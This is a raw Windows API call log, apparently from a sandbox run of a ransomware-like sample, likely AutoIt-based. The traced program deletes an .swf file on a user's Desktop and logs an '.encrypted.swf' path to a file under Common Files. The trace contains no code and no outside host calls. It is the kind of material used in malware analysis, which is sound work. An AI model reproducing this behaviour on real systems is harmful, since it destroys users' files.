[0030.644] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.645] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\clveu\\atelwg4 7fdtq.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0030.645] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.645] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.645] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.645] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.645] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0030.645] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.645] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.645] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.645] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.645] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.645] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.645] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.646] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.646] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0030.646] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.646] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.646] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.646] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.646] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.646] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.646] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.646] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf", lpFilePart=0x0) returned 0x50 [0030.646] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb93c3970, ftCreationTime.dwHighDateTime=0x1d5c366, ftLastAccessTime.dwLowDateTime=0xe2c02960, ftLastAccessTime.dwHighDateTime=0x1d5beb5, ftLastWriteTime.dwLowDateTime=0x1227ac80, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x4857, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="AtELWG4 7FDtQ.swf", cAlternateFileName="ATELWG~1.SWF")) returned 0x7c2100 [0030.646] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\clveu\\atelwg4 7fdtq.swf")) returned 1 [0030.647] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb93c3970, ftCreationTime.dwHighDateTime=0x1d5c366, ftLastAccessTime.dwLowDateTime=0xe2c02960, ftLastAccessTime.dwHighDateTime=0x1d5beb5, ftLastWriteTime.dwLowDateTime=0x1227ac80, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x4857, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="AtELWG4 7FDtQ.swf", cAlternateFileName="ATELWG~1.SWF")) returned 0 [0030.647] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0030.647] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.648] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0030.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0030.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0030.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0030.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0030.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0030.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0030.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0030.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0030.648] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0030.648] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0030.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0030.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0030.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0030.649] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.649] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.649] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="swf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.649] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".swf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0030.649] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0030.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0030.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0030.649] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0030.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0030.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0030.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0030.649] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0030.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0030.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0030.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0030.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0030.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0030.649] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0030.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0030.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0030.649] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0030.650] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0030.650] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0030.650] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0030.650] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0030.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0030.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x88ffb0 [0030.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0030.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0030.651] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0030.651] ReadFile (in: hFile=0x140, lpBuffer=0x936008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x936008*, lpNumberOfBytesRead=0x6aee3c*=0x482, lpOverlapped=0x0) returned 1 [0030.651] ReadFile (in: hFile=0x140, lpBuffer=0x936008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x936008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0030.652] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x482, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0030.652] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0030.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0030.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0030.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0030.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0030.652] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.encrypted.swf\r\n", cchWideChar=93, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 93 [0030.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x5d) returned 0x87aa40 [0030.652] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.encrypted.swf\r\n", cchWideChar=93, lpMultiByteStr=0x87aa40, cbMultiByte=93, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.encrypted.swf\r\n", lpUsedDefaultChar=0x0) returned 93 [0030.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0030.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87a9d8 [0030.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0030.652] WriteFile (in: hFile=0x140, lpBuffer=0x87a9d8*, nNumberOfBytesToWrite=0x5c, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x87a9d8*, lpNumberOfBytesWritten=0x6aee3c*=0x5c, lpOverlapped=0x0) returned 1 [0030.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0030.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0030.652] CloseHandle (hObject=0x140) returned 1 [0030.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0030.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0030.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x936008 | out: hHeap=0x770000) returned 1 [0030.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0030.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0030.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0030.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0030.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0030.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0030.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0030.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0030.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0030.654] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0030.654] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0030.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0030.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0030.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0030.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0030.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c55e8 | out: hHeap=0x770000) returned 1 [0030.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0030.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0030.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0030.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0030.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0030.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0030.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0030.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0030.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0030.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0030.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0030.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0030.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0030.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0030.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0030.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0030.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0030.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0030.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0030.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0030.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0030.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0030.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0030.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0030.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0030.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0030.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0030.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0030.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0030.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0030.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0030.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0030.655] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0030.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0030.655] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0030.655] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0030.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0030.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0030.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0030.656] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0030.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0030.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0030.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0030.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af478 [0030.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0030.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0030.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0030.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0030.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0030.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0030.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0030.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889508 [0030.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0030.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0030.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0030.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0030.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0030.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0030.656] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0030.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0030.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0030.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0030.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0030.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0030.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0030.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0030.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0030.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0030.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0030.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0030.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0030.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0030.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0030.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0030.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0030.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0030.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0030.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0030.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0030.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0030.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0030.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0030.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0030.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0030.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0030.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 